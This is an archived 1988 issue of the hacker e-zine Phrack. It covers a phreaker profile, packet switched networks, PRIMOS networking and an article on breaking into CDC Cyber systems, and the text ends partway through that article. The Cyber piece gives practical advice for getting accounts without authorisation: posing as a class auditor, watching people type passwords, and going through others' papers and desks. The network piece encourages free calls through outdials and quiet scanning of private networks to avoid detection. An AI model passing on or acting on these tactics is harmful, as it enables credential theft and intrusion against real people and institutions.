home *** CD-ROM | disk | FTP | other *** search
/ Phoenix Rising BBS / phoenixrising.zip / phoenixrising / phrack / phrack18.arj / PHRACK.18
Text File  |  1990-09-12  |  150KB  |  2,885 lines

  1.  
  2.  
  3.                                ==Phrack Inc.==
  4.  
  5.                      Volume Two, Issue 18, Phile #1 of 11
  6.  
  7.                                     Index
  8.                                     =====
  9.                                 June 7, 1988
  10.  
  11.     Well, Phrack Inc. is still alive but have changed editors again. I,
  12. Crimson Death am now the new editor of Phrack Inc.  The reason why I am the
  13. new editor is because of the previous editors in school and they did not just
  14. have the time for it.  So, if you would like to submit an article for Phrack
  15. Inc. please contact:  Crimson Death, Control C, or Epsilon, or call my BBS
  16. (The Forgotten Realm) or one of the BBSes on the sponsor BBS listing (Found in
  17. PWN Part 1).  We are ALWAYS looking for more files to put in upcoming issues.
  18. Well, that about does it for me.  I hope you enjoy Phrack 18 as much as we at
  19. The Forgotten Realm did bringing it to you.  Later...
  20.                                                   Crimson Death
  21.                                            Sysop of The Forgotten Realm
  22.  
  23. ------------------------------------------------------------------------------
  24.  
  25. This issue of Phrack Inc. includes the following:
  26.  
  27. #1  Index of Phrack 18 by Crimson Death                      (02k)
  28. #2  Pro-Phile XI on Ax Murderer by Crimson Death             (04k)
  29. #3  An Introduction to Packet Switched Networks by Epsilon   (12k)
  30. #4  Primos: Primenet, RJE, DPTX by Magic Hasan               (15k)
  31. #5  Hacking CDC's Cyber by Phrozen Ghost                     (12k)
  32. #6  Unix for the Moderate by Urvile                          (11k)
  33. #7  Unix System Security Issues by Jester Sluggo             (27k)
  34. #8  Loop Maintenance Operating System by Control C           (32k)
  35. #9  A Few Things About Networks by Prime Suspect             (21k)
  36. #10 Phrack World News XVIII Part I by Epsilon                (09k)
  37. #11 Phrack World News XVIII Part II by Epsilon               (05k)
  38. ==============================================================================
  39.  
  40.                                ==Phrack Inc.==
  41.  
  42.                      Volume Two, Issue 18, Phile #2 of 11
  43.  
  44.                            ==Phrack Pro-Phile XI==
  45.  
  46.                      Written and Created by Crimson Death
  47.  
  48.     Welcome to Phrack Pro-Phile XI.  Phrack Pro-Phile is created to bring info
  49. to you, the users, about old or highly important/controversial people.  This
  50. month, I bring to you a name familiar to most in the BBS world...
  51.  
  52.                                   Ax Murderer
  53.                                   ===========
  54.  
  55. Ax Murderer is popular to many of stronger names in the P/H community.
  56. ------------------------------------------------------------------------------
  57. Personal
  58. ========
  59.              Handle:  Ax Murderer
  60.            Call him:  Mike
  61.        Past handles:  None
  62.       Handle origin:  Thought of it while on CompuServe.
  63.       Date of Birth:  10/04/72
  64. Age at current date:  15
  65.              Height:  6' 2''
  66.              Weight:  205 Lbs.
  67.           Eye color:  Brown
  68.          Hair Color:  Brown
  69.           Computers:  IBM PC, Apple II+, Apple IIe
  70.   Sysop/Co-Sysop of:  The Outlet Private, Red-Sector-A, The Autobahn
  71.  
  72. ------------------------------------------------------------------------------
  73.     Ax Murderer started phreaking and hacking in 1983 through the help of some
  74. of his friends.  Members of the Hack/Phreak world which he has met include
  75. Control C, Bad Subscript, The Timelord.  Some of the memorable phreak/hack
  76. BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn,
  77. Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland.
  78. His phreaking and hacking knowledge came about with a group of people in which
  79. some included Forest Ranger and The Timelord.
  80.  
  81.     Ax Murderer is a little more interested in Phreaking than hacking.  He
  82. does like to program however, he can program in 'C', Basic, Pascal, and
  83. Machine Language.
  84.  
  85.     The only group in which Ax Murderer has been in is Phoneline Phantoms.
  86. ------------------------------------------------------------------------------
  87.  
  88.         Interests:  Telecommunications (Modeming, phreaking, hacking,
  89.                     programming), football, track, cars, and music.
  90.  
  91. Ax Murderer's Favorite Thing
  92. ----------------------------
  93.  
  94.   His car... (A Buick Grand National)
  95.   His gilrfriend... (Sue)
  96.   Rock Music
  97.  
  98. Most Memorable Experiences
  99. --------------------------
  100.  
  101.   Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial)
  102.  
  103. Some People to Mention
  104. ----------------------
  105.  
  106. Forest Ranger (For introducing me to everyone and getting me on Dragon Fire)
  107. Taran King (For giving me a chance on MSP and the P/H world)
  108. Mind Bender (For having ANY utilities I ever needed)
  109. The Necromancer (Getting me my Apple'cat)
  110. The Titan (Helping me program the BBS)
  111.  
  112. All for being friends and all around good people and phreaks.
  113. ------------------------------------------------------------------------------
  114.  
  115.     Ax Murderer is out and out against the idea of the destruction of data.
  116. He hated the incident with MIT where the hackers were just hacking it to
  117. destroy files on the system.  He says that it ruins it for the everyone else
  118. and gives 'True Hackers' a bad name.  He hates it when people hack to destroy,
  119. Ax has no respect for anyone who does this today.  Where have all the good
  120. times gone?
  121.  
  122. ------------------------------------------------------------------------------
  123.  
  124. I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
  125. in the near future....  And now for the regularly taken poll from all
  126. interviewees.
  127.  
  128. Of the general population of phreaks you have met, would you consider most
  129. phreaks, if any, to be computer geeks? "No, not really."  Thanks Mike.
  130.  
  131.                                           Crimson Death
  132.                                    Sysop of The Forgotten Realm
  133. ==============================================================================
  134.  
  135.                                ==Phrack Inc.==
  136.  
  137.                      Volume Two, Issue 18, Phile #3 of 11
  138.  
  139.          _ _ _ _ _____________________________________________ _ _ _ _
  140.          _-_-_-_-                                             -_-_-_-_
  141.          _-_-_-_-             An Introduction To              -_-_-_-_
  142.          _-_-_-_-                                             -_-_-_-_
  143.          _-_-_-_-          Packet Switched Networks           -_-_-_-_
  144.          _-_-_-_-                                             -_-_-_-_
  145.          _-_-_-_-                                             -_-_-_-_
  146.          _-_-_-_-                                             -_-_-_-_
  147.          _-_-_-_-  Written By -                   Revised -   -_-_-_-_
  148.          _-_-_-_-                                             -_-_-_-_
  149.          _-_-_-_-  Epsilon                        05/3/88     -_-_-_-_
  150.          _-_-_-_-_____________________________________________-_-_-_-_
  151.  
  152.  
  153. Preface -
  154.  
  155.    In the past few years, Packet Switched Networks have become a prominent
  156. feature in the world of telecommunications.  These networks have provided ways
  157. of communicating with virtually error-free data, over very large distances.
  158. These networks have become an imperative to many a corporation in the business
  159. world.  In this file we will review some of the basic aspects of Packet
  160. Switched Networks.
  161.  
  162. Advantages -
  163.  
  164.    The Packet Switched Network has many advantages to the common user, and
  165. even more to the hacker, which will be reviewed in the next topic.
  166.  
  167.    The basis of a Packet Switched Network is the Packet Switch.  This network
  168. enables the service user to connect to any number of hosts via a local POTS
  169. dial-up/port. The various hosts pay to be connected to this type of network,
  170. and that's why there is often a surcharge for connection to larger public
  171. services like Compuserve or The Source.
  172.  
  173.    A Packet Switched Network provides efficient data transfer and lower rates
  174. than normal circuit switched calls, which can be a great convenience if you
  175. are planning to do a lot of transferring of files between you and the host.
  176.  
  177.    Not only is the communication efficient, it is virtually error free.
  178. Whereas in normal circuit switched calls, there could be a drastic increase in
  179. errors, thus creating a bad transfer of data.
  180.  
  181.    When using a Packet Switched Network, it is not important that you
  182. communicate at the same baud rate as your host.  A special device regulates
  183. the speed so that the individual packets are sped up or slowed down, according
  184. to your equipment.  Such a device is called a PAD (Packet Assembler
  185. Disassembler).
  186.  
  187.    A PSN also provides access to a variety of information and news retrieval
  188. services.  The user pays nothing for these calls, because the connections  are
  189. collect. Although the user may have to subscribe to the service to take
  190. advantage of it's services, the connection is usually free, except for a
  191. surcharge on some of the larger subscription services.
  192.  
  193. Advantages To Hackers -
  194.  
  195.    Packet Switched Networks, to me, are the best thing to come along since the
  196. phone system.  I'm sure many other hackers feel the same way.  One of the
  197. reasons for this opinion is that when hacking a system, you need not dial out
  198. of your LATA, using codes or otherwise.
  199.  
  200.    Now, the hacker no longer has to figure out what parameters he has to set
  201. his equipment to, to communicate with a target computer effectively.  All
  202. PSSes use the same protocol, set by international standards.  This protocol is
  203. called X.25.  This protocol is used on every network-to-network call in the
  204. world.
  205.  
  206.    When operating on a packet switch, you are not only limited to your own
  207. network (As if that wasn't enough already).  You can access other PSSes or
  208. private data networks through gateways which are implemented in your PSN.
  209. There are gateways to virtually every network, from virtually every other
  210. network, except for extremely sensitive or private networks, in which case
  211. would probably be completely isolated from remote access.
  212.  
  213.    Another advantage with PSNs is that almost everyone has a local port, which
  214. means if you have an outdial (Next paragraph), you can access regular circuit
  215. switched hosts via your local Packet Switched Network port.  Since the ports
  216. are local, you can spend as much time as you want on it for absolutely no
  217. cost.  So think about it.  Access to any feasible network, including overseas
  218. PSNs and packet switches, access to almost any host, access to normal circuit
  219. switched telephone-reachable hosts via an outdial, and with an NUI (Network
  220. User Identity - Login and password entered at the @ prompt on Telenet),
  221. unlimited access to any NUA, reverse-charged or not.
  222.  
  223.    Due to the recent abuse of long distance companies, the use of codes when
  224. making free calls is getting to be more and more  hazardous.  You may ask, 'Is
  225. there any resort to making free calls without using codes, and without using a
  226. blue  box?'  The answer is yes, but only when using data.  With an outdial,
  227. accessible from your local PSN port, you can make data calls with a remote
  228. modem, almost always connected directly to a server, or a port selector. This
  229. method of communicating is more efficient, safer, and more reliable than using
  230. any code.  Besides, with the implementation of equal access,  and the
  231. elimination of 950 ports, what choice will you have?
  232.  
  233. Some Important Networks -
  234.  
  235.    As aforementioned, PSNs are not only used in the United States.  They are
  236. all over the place.  In Europe, Asia, Canada, Africa, etc.  This is a small
  237. summary of some of the more popular PSNs around the world.
  238.  
  239.          Country          Network Name          *DNIC
  240.          ~~~~~~~          ~~~~~~~ ~~~~           ~~~~
  241.          Germany          Datex-P                2624
  242.          Canada           Datapac                3020
  243.          Italy            Datex-P                0222
  244.          South Africa     Saponet                0655
  245.          Japan            Venus-P                4408
  246.          England          Janet/PSS              2342
  247.          USA              Tymnet                 3106
  248.          USA              Telenet                3110
  249.          USA              Autonet                3126
  250.          USA              RCA                    3113
  251.          Australia        Austpac                0505
  252.          Ireland          Irepac                 2724
  253.          Luxembourg       Luxpac                 2704
  254.          Singapore        Telepac                5252
  255.          France           Transpac               2080
  256.          Switzerland      Telepac                2284
  257.          Sweden           Telepac                2405
  258.          Israel           Isranet                4251
  259.          ~~~~~~~~~        ~~~~~~~                ~~~~
  260.          * - DNIC (Data Network Identification Code)
  261.              Precede DNIC and logical address with a
  262.              '0' when using Telenet.
  263. ______________________________________________________________________________
  264.  
  265. Notes On Above Networks -
  266.  
  267.    Some countries may have more than one Packet Switching Network.  The ones
  268. listed are the more significant networks for each country.  For example, the
  269. United States has eleven public Packet Switching Networks, but the four I
  270. listed are the major ones.
  271.  
  272.    Several countries may also share one network, as shown above.  Each country
  273. will have equal access to the network using the basic POTS dial-up ports.
  274.  
  275. Focus On Telenet -
  276.  
  277.    Since Telenet is one of the most famous, and highly used PSNs in the United
  278. States, I thought that informing you of some of the more interesting aspects
  279. of this network would be beneficial.
  280.  
  281. Interconnections With Other Network Types -
  282.  
  283.    Packet Switched Networks are not the only type of networks which connect a
  284. large capacity of hosts together.  There are also Wide Area Networks, which
  285. operate on a continuous link basis, rather than a packet switched basis.
  286. These networks do not use the standardized X.25 protocol, and can only be
  287. reached by direct dial-ups, or by connecting to a host which has network
  288. access permissions.  The point is, that if you wanted to reach, say, Arpanet
  289. from Telenet, you would have to have access to a host which is connected to
  290. both networks.  This way, you can connect to the target host computer via
  291. Telenet, and use the WAN via the target host.
  292.  
  293.    WANs aren't the only other networks you can access.  Also, connections to
  294. other small, private, interoffice LANs are quite common and quite feasible.
  295.  
  296. Connections To International NUAs via NUIs -
  297.  
  298.    When using an NUI, at the prompt, type 0+DNIC+NUA.  After your connection
  299. is established, proceed to use the system you've reached.
  300.  
  301. Private Data Networks -
  302.  
  303.    Within the large Packet Switched Networks that are accessible to us there
  304. are also smaller private networks.  These networks can sometimes be very
  305. interesting as they may contain many different systems.  A way to identify a
  306. private network is by looking at the three digit prefix.  Most prefixes
  307. accessible by Telenet are based on area codes.  Private networks often have a
  308. prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144)
  309. Those prefixes are not real networks, just examples.
  310.  
  311.    Inside these private networks, there are often  smaller networks which are
  312. connected with some type of host selector or gateway server.  If you find
  313. something like this, there may be hosts that can be accessed only by this port
  314. selector/server, and not by the normal prefix.  It is best to find out what
  315. these other addresses translate to, in case you are not able to access the
  316. server for some reason.  That way, you always have a backup method of reaching
  317. the target system (Usually the addresses that are accessed by a gateway
  318. server/port selector translate to normal NUAs accessible from your Telenet
  319. port).
  320.  
  321.    When exploring a private network, keep in mind that since these networks
  322. are smaller, they would most likely be watched more closely during business
  323. hours then say Telenet or Tymnet.  Try to keep your scanning and tinkering
  324. down to a minimum on business hours to avoid any unnecessary trouble.
  325. Remember, things tend to last longer if you don't abuse the hell out of them.
  326.  
  327. Summary -
  328.  
  329.    I hope this file helped you out a bit, and at least gave you a general idea
  330. of what PSNs are used for, and some of the advantages of using these networks.
  331. If you can find something interesting during your explorations of PSNs, or
  332. Private Data Networks, share it, and spread the knowledge around.  Definitely
  333. exploit what you've found, and use it to your advantage, but don't abuse it.
  334.  
  335. If you have any questions or comments, you reach me on -
  336.  
  337.              The FreeWorld II/Central Office/Forgotten Realm/TOP.
  338.  
  339.    I hope you enjoyed my file.  Thanks for your time.  I should be writing a
  340. follow up article to this one as soon as I can.  Stay safe..
  341.  
  342.          - Epsilon
  343. ______________________________________________________________________________
  344.  
  345.                                 - Thanks To -
  346.  
  347.          Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist
  348. ______________________________________________________________________________
  349.  
  350.                                ==Phrack Inc.==
  351.  
  352.                      Volume Two, Issue 18, Phile #4 of 11
  353.  
  354.    -------------------------------------------------------------------------
  355.    -                                                                       -
  356.    -                                                                       -
  357.    -           PRIMOS:                                                     -
  358.    -                       NETWORK  COMMUNICATIONS                         -
  359.    -                                                                       -
  360.    -                       PRIMENET, RJE, DPTX                             -
  361.    -                                                                       -
  362.    -                                                                       -
  363.    - Presented by Magic Hasan                                   June 1988  -
  364.    -------------------------------------------------------------------------
  365.  
  366.  
  367.    PRIME's uniform operating system, PRIMOS, supports a wide range of
  368. communications products to suit any distributed processing need.  The PRIMENET
  369. distributed networking facility provides complete local and remote network
  370. communication services for all PRIME systems.  PRIME's Remote Job Entry (RJE)
  371. products enable multi-user PRIME systems to emulate IBM, CDC, Univac,
  372. Honeywell and ICL remote job entry terminals over synchronous communication
  373. lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users
  374. to construct communication networks with PRIME and IBM-compatible equipment.
  375.  
  376.                                    PRIMENET
  377.                                    --------
  378.  
  379.    PRIMENET provides complete local and remote network communication services
  380. for all PRIME systems.  PRIMENET networking software lets a user or process on
  381. one PRIME system communicate with any other PRIME system in the network
  382. without concern for any protocol details.  A user can log in to any computer
  383. in the network from any terminal in the network.  With PRIMENET, networking
  384. software processes running concurrently on different systems can communicate
  385. interactively.  PRIMENET allows transparent access to any system in the
  386. network without burdening the user with extra commands.
  387.  
  388.    PRIMENET has been designed and implemented so that user interface is simple
  389. and transparent.  Running on a remote system from a local node of the network
  390. or accessing remote files requires no reprogramming of user applications or
  391. extensive user training.  All the intricacies and communication protocols of
  392. the network are handled by the PRIMENET software.  For both the local and
  393. remote networks, PRIMENET will allow users to share documents, files, and
  394. programs and use any disk or printer configured in the network.
  395.  
  396.    For a local network between physically adjacent systems, PRIME offers the
  397. high-performance microprocessor, the PRIMENET Node Controller (PNC).  The
  398. controller users direct memory access for low overhead and allows loosely
  399. coupled nodes to share resources in an efficient manner.  The PNCs for each
  400. system are connected to each other with a coaxial cable to form a high-speed
  401. ring network, with up to 750 feet (230 meters) between any two systems.
  402.  
  403.    Any system in the PNC ring can establish virtual circuits with any other
  404. system, making PNC-based networks "fully connected" with a direct path between
  405. each pair of systems.  The ring has sufficient bandwidth (1 MB per second) and
  406. addressing capability to accommodate over 200 systems in a ring structure;
  407. however, PRIMENET currently supports up to sixteen systems on a ring to
  408. operate as a single local network.
  409.  
  410.    The PRIMENET Node Controller is designed to assure continuity of operation
  411. in the event that one of the systems fails.  One system can be removed from
  412. the network or restored to on-line status without disturbing the operations of
  413. the other system.  An active node is unaware of messages destined for other
  414. nodes in the network, and the CPU is notified only when a message for that
  415. node has been correctly received.
  416.  
  417.    Synchronous communications over dedicated leased lines or dial-up lines is
  418. provided through the Multiple Data Link Controller (MDLC).  This controller
  419. handles certain protocol formatting and data transfer functions normally
  420. performed by the operating system in other computers.  The controller's
  421. microprogrammed architecture increases throughput by eliminating many tasks
  422. from central processor overhead.
  423.  
  424.    The communications controller also supports multiple protocols for
  425. packet-switched communications with Public Data Networks such as the United
  426. States' TELENET and TYMNET, the Canadian DATAPAC, Great Britain's
  427. International Packet Switching Service (IPSS), France's TRANSPAC, and the
  428. European Packet Switching Network, EURONET.  Most Public Data Networks require
  429. computers to use the CCITT X.25 protocol to deal with the management of
  430. virtual circuits between a system and others in the network.  The synchronous
  431. communications controller supports this protocol.  PRIME can provide the X.25
  432. protocol for use with the PRIMENET networking software without modification to
  433. the existing hardware configuration.
  434.  
  435.    PRIMENET software offers three distinct sets of services.  The
  436. Inter-Program Communication Facility (IPCF) lets programs running under the
  437. PRIMOS operating system establish communications paths (Virtual circuits) to
  438. programs in the same or another PRIME system, or in other vendors' systems
  439. supporting the CCITT X.25 standard for packet switching networks.  The
  440. Interactive Terminal Support (ITS) facility permits terminals attached to a
  441. packet switching network, or to another PRIME system, to log-in to a PRIME
  442. system with the same capabilities they would have if they were directly
  443. attached to the system.  The File Access Manager (FAM) allows terminal users
  444. or programs running under the PRIMOS operating system to utilize files
  445. physically stored on other PRIME systems in a network.  Remote file operations
  446. are logically transparent to the application program.  This means no new
  447. applications and commands need  to be learned for network operation.
  448.  
  449.    The IPCF facility allows programs in a PRIME computer to exchange data with
  450. programs in the same computer, another PRIME computer, or another vendor's
  451. computer, assuming that that vendor supports X.25.  This feature is the most
  452. flexible and powerful one that any network software package can provide.  It
  453. basically allows an applications programmer to split up a program, so that
  454. different pieces of the program execute on different machines a network.  Each
  455. program component can be located close to the resource (terminals, data,
  456. special peripherals, etc.) it must handle, decode the various pieces and
  457. exchange data as needed, using whatever message formats the application
  458. designer deems appropriate.  The programmer sees PRIMENET's IPCF as a series
  459. of pipes through which data can flow.  The mechanics of how the data flows are
  460. invisible; it just "happens" when the appropriate services are requested.  If
  461. the two programs happen to end up on the same machine, the IPCF mechanism
  462. still works.  The IPCF offers the following advantages:
  463.  
  464.         1)  The User does not need to understand the detailed
  465.             mechanisms of communications software in order to
  466.             communicate.
  467.         2)  Calls are device-independent.  The same program will
  468.             work over physical links implemented by the local node
  469.             controller (local network), leased lines, or a packet
  470.             network.
  471.         3)  Programs on one system can concurrently communicate
  472.             with programs on other systems using a single
  473.             communications controller.  PRIMENET handles all
  474.             multiplexing of communications facilities.
  475.         4)  A single program can establish multiple virtual
  476.             circuits to other programs in the network.
  477.  
  478.    PRIMENET's ITS facility allows an interactive terminal to have access to
  479. any machine in the network.  This means that terminals can be connected into
  480. an X.25 packet network along with PRIME computers.  Terminal traffic between
  481. two systems is multiplexed over the same physical facilities as inter-program
  482. data, so no additional hardware is needed to share terminals between systems.
  483.  
  484.    This feature is ordinarily invisible to user programs, which cannot
  485. distinguish data entering via a packet network from data coming in over AMLC
  486. lines.  A variant of the IPCF facility allows users to include the terminal
  487. handling protocol code in their own virtual space, thus enabling them to
  488. control multiple terminals on the packet network within one program.
  489. Terminals entering PRIMOS in this fashion do not pass through the usual log-in
  490. facility, but are immediately connected to the application program they
  491. request. (The application program provides whatever security checking is
  492. required.)
  493.  
  494.    The result is the most effective available means to provide multi-system
  495. access to a single terminal, with much lower costs for data communications and
  496. a network which is truly available to all users without the expense of
  497. building a complicated private network of multiplexors and concentrators.
  498.  
  499.    By utilizing PRIMENET's File Access Manager (FAM), programs running under
  500. PRIMOS can access files on other PRIME systems using the same mechanisms used
  501. to access local files.  This feature allows users to move from a single-system
  502. environment to a multiple-system one without difficulty.  When a program and
  503. the files it uses are separated into two (or more) systems the File Access
  504. Management (FAM)is automatically called upon whenever the program attempts to
  505. use the file.  Remote file operations are logically  transparent to the user
  506. or program.
  507.  
  508.    When a request to locate a file or directory cannot be satisfied locally,
  509. the File Access Manager is invoked to find the data elsewhere in the network.
  510. PRIMOS initiates a remote procedure call to the remote system and suspends the
  511. user.  This procedure call is received by an answering slave process on the
  512. remote system, which performs the requested operation and returns data via
  513. subroutine parameters.  The slave process on the remote system is dedicated to
  514. its calling master process (user) on the local system until released.  A
  515. master process (user) can have a slave process on each of several remote
  516. systems simultaneously.  This means that each user has a dedicated connection
  517. for the duration of the remote access activity so many requests  can be
  518. handled in parallel.
  519.  
  520.    FAM operation is independent of the specific network hardware connecting
  521. the nodes.  There is no need to rewrite programs or learn new commands when
  522. moving to the network environment.  Furthermore, the user need only be
  523. logged-in to one system in the network, regardless of the location of the
  524. file.  Files on the local system or remote systems can be accessed dynamically
  525. by file name within a program, using the language-specific open and close
  526. statements.  No external job control language statements are needed for the
  527. program to access files. Inter-host file transfers and editing can be
  528. performed using the same PRIMOS utilities within the local system by
  529. referencing the remote files with their actual file names.
  530.  
  531.                                 REMOTE JOB ENTRY
  532.                                 ----------------
  533.  
  534.    PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate
  535. IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over
  536. synchronous communication lines.  PRIME's RJE provides the same communications
  537. and peripheral support as the RJE terminals they emulate, appearing to the
  538. host processor to be those terminals.  All PRIME  RJE products provide three
  539. unique benefits:
  540.  
  541.         * PRIME RJE is designed to communicate with multiple
  542.           remote sites simultaneously.
  543.  
  544.         * PRIME RJE enables any terminal connected to a PRIME system to
  545.           submit jobs for transmission to remote processors, eliminating the
  546.           requirement for dedicated terminals or RJE stations at each
  547.           location.
  548.  
  549.         * PRIME's mainframe capabilities permit concurrent running of RJE
  550.           emulators, program development and production work.
  551.  
  552.    PRIME's RJE supports half-duplex, point-to-point, synchronous
  553. communications and operates over dial-up and dedicated lines.  It is fully
  554. supported by the PRIMOS operating system.
  555.  
  556.  
  557.                  DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX)
  558.                  ------------------------------------------------
  559.  
  560.    PRIME's Distributed Processing Terminal Executive (DPTX) allows users to
  561. construct communication networks with PRIME and IBM-compatible equipment.
  562. DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated
  563. into networks containing IBM mainframes, terminals and printers without
  564. changing application code or access methods and operates under the PRIMOS
  565. operating system.
  566.  
  567.    DPTX is compatible with all IBM 370 systems and a variety of access methods
  568. and teleprocessing monitors:  BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO.  They
  569. provide transmission speeds up to 9600 bps using IBM's Binary Synchronous
  570. Communications (BSC) protocol.
  571.  
  572.    DPTX is comprised of three software modules that allow PRIME systems to
  573. emulate and support IBM or IBM compatible 3271/3277 Display Systems.  One
  574. module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to
  575. emulate the operation of a 3271 on the IBM system.  This enables both terminal
  576. user and application programs (interactive or batch) on the PRIME System to
  577. reach application programs on an IBM mainframe.  A second module, Terminal
  578. Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM
  579. 3271/3277 devices.  This enables terminal users to reach application programs
  580. on a PRIME computer.  The third module, Transparent Connect Facility
  581. (DPTX/TCF), combines the functions of modules one and two with additional
  582. software allowing 3277 terminal users to to reach programs on a IBM mainframe,
  583. even though the terminal subsystem is physically connected to a PRIME system,
  584. which is connected to an IBM system.
  585.  
  586.    PRIMOS offers a variety of different Communication applications.  Being
  587. able to utilize these applications to their fullest extent can make life easy
  588. for a Primos "enthusiast."  If you're a beginner with Primos, the best way to
  589. learn more, as with any other system, is to get some "hands-on" experience.
  590. Look forward to seeing some beginner PRIMOS files in the near future.  -MH
  591. ------------------------------------------------------------------------------
  592.  
  593. Special thanks to PRIME INC. for unwittingly providing the text for this
  594. article.
  595. ===============================================================================
  596.  
  597.                                ==Phrack Inc.==
  598.  
  599.                      Volume Two, Issue 18, Phile #5 of 11
  600.  
  601.     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  602.    -=                                                                     =-
  603.    -=               Hacking Control Data Corporation's Cyber              =-
  604.    -=                                                                     =-
  605.    -=               Written by Phrozen Ghost, April 23, 1988              =-
  606.    -=                                                                     =-
  607.    -=                   Exclusively for Phrack Magazine                   =-
  608.    -=                                                                     =-
  609.     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  610.  
  611.   This article will cover getting into and using NOS (Networking Operating
  612. System) version 2.5.2 running on a Cyber 730 computer.  Cybers generally run
  613. this operating system so I will just refer to this environ- ment as Cyber.
  614. Also, Cyber is a slow and outdated operating system that is primarily used
  615. only for college campuses for running compilers.  First off after you have
  616. scanned a bunch of carriers you will need to know how Cyber identifies itself.
  617. It goes like this:
  618.  
  619. WELCOME TO THE NOS SOFTWARE SYSTEM.
  620. COPYRIGHT CONTROL DATA 1978, 1987.
  621.  
  622. 88/02/16. 02.36.53. N265100
  623. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  624. FAMILY:
  625.  
  626. You would normally just hit return at the family prompt.  Next prompt is:
  627.  
  628. USER NAME:
  629.  
  630. Usernames are in the format  abcdxxx  where a is the location of where the
  631. account is being used from (A-Z).  the b is a grouping specifying privs and
  632. limits for the account- usually A-G -where A is the lowest access.  Some
  633. examples of how they would be used in a college system:
  634. A = lowest access - class accounts for students
  635. B = slightly higher than A (for students working on large projects)
  636. C = Much higher limits, these accounts are usually not too hard to get and
  637.     they will normally last a long time!  Lab assistants use these.
  638. D = Instructors, Lecturers, Professors.. etc..
  639. E = same... (very hard to get these!)
  640.  
  641. The C and D positions are usually constant according to the groupings.
  642. For example, a class would have accounts ranging from NADRAAA-AZZ
  643.                                                           ^^^ ^^^
  644.                                                  These can also be digits
  645.  
  646. There are also special operator accounts which start with digits instead of
  647. numbers. (ie 7ETPDOC)  These accounts can run programs such as the monitor
  648. which can observe any tty connected to the system...
  649.  
  650. The next prompt will be for the password, student account passwords cannot be
  651. changed and are 7 random letters by default, other account passwords can be
  652. changed.  You get 3 tries until you are logged out.  It is very difficult if
  653. not impossible to use a brute force hacker or try to guess someone's account..
  654. so how do you get on?  Here's one easy way... Go down to your local college
  655. (make sure they have a Cyber computer!) then just buy a class catalog (they
  656. only cost around 50 cents) or you could look, borrow, steal someone else's...
  657. then find a pascal or fortran class that fits your schedule!  You will only
  658. have to attend the class 3 or 4 times max.  Once you get there you should have
  659. no trouble, but if the instructor asks you questions about why you are not on
  660. the roll, just tell him that you are auditing the class (taking it without
  661. enrolling so it won't affect your GPA).  The instructor will usually pass out
  662. accounts on the 3rd or 4th day of class.. this method also works well with
  663. just about any system they have on campus!  Another way to get accounts is to
  664. go down to the computer lab and start snooping!  Look over someone's shoulder
  665. while they type in their password, or look thru someone's papers while they're
  666. in the bathroom, or look thru the assistants desk while he is helping
  667. someone... (I have acquired accounts both ways, and the first way is a lot
  668. easier with less hassles)  Also, you can use commas instead of returns when
  669. entering username and password.
  670. Example:  at the family prompt, you could type  ,nadrajf,dsfgkcd
  671.                      or at the username prompt   nadrajf,dsfgkcd
  672.  
  673. After you enter your info, the system will respond with:
  674.  
  675. JSN: APXV, NAMIAF
  676. /
  677.  
  678. The 'APXV, NAMIAF' could be different depending on what job you were attached
  679. to.  The help program looks a lot neater if you have vt100 emulation, if you
  680. do, type [screen,vt100] (don't type the brackets! from now on, all commands I
  681. refer to will be enclosed in brackets) Then type help for an extensive
  682. tutorial or a list of commands. Your best bet at this point is to buy a quick
  683. reference guide at the campus because I am only going to describe the most
  684. useful commands. The / means you are in the batch subsystem, there are usually
  685. 6 or 7 other subsystems like basic, fortran, etc... return to batch mode by
  686. typing [batch].
  687.  
  688. Some useful commands:
  689.  
  690.    CATLIST    -  will show permanent files in your directory.
  691.    ENQUIRE,F  -  displays temporary files in your workspace.
  692.    LIMITS     -  displays your privileges.
  693.    INFO       -  get more on-line help.
  694.    R          -  re-execute last command.
  695.    GET,fn     -  loads fn into the local file area.
  696.    CHANGE     -  change certain specs on a file.
  697.    PERMIT     -  allow other users to use one of your files.
  698.    REWIND,*   -  rewinds all your local files.
  699.    NEW,fn     -  creates new file.
  700.    PURGE      -  deletes files.
  701.    LIST,F=fn  -  list file.
  702.    UPROC      -  create an auto-execute procedure file.
  703.    MAIL       -  send/receive private mail.
  704.    BYE        -  logoff.
  705.  
  706. Use the [helpme,cmd] command for the exact syntax and parameters of these
  707. commands.  There are also several machine specific 'application' programs such
  708. as pascal, fortran, spitbol, millions of others that you can look up with the
  709. INFO command... there are also the text editors; edit, xedit, and fse (full
  710. screen editor).  Xedit is the easiest to use if you are not at a Telray 1061
  711. terminal and it has full documentation.  Simply type [xedit,fn] to edit the
  712. file 'fn'.
  713.  
  714. Special control characters used with Cyber:
  715.  
  716. Control S and Control Q work normally, the terminate character is Control T
  717. followed by a carriage return.  If you wanted to break out of an auto-execute
  718. login program, you would have to hit ^T C/R very fast and repetitively in
  719. order to break into the batch subsystem.  Control Z is used to set environment
  720. variables and execute special low level commands, example: [^Z TM C/R] this
  721. will terminate your connection...
  722.  
  723. So now you're thinking, what the hell is Cyber good for?  Well, they won't
  724. have any phone company records, and you can't get credit information from one,
  725. and I am not going to tell you how to crash it since crashing systems is a
  726. sin.  There are uses for a Cyber though,  one handy use is to set up a chat
  727. system, as there are normally 30-40 lines going into a large university Cyber
  728. system.  I have the source for a chat program called the communicator that I
  729. will be releasing soon.  Another use is some kind of underground information
  730. exchange that people frequently set up on other systems, this can easily be
  731. done with Cyber.
  732.  
  733. Procedure files:
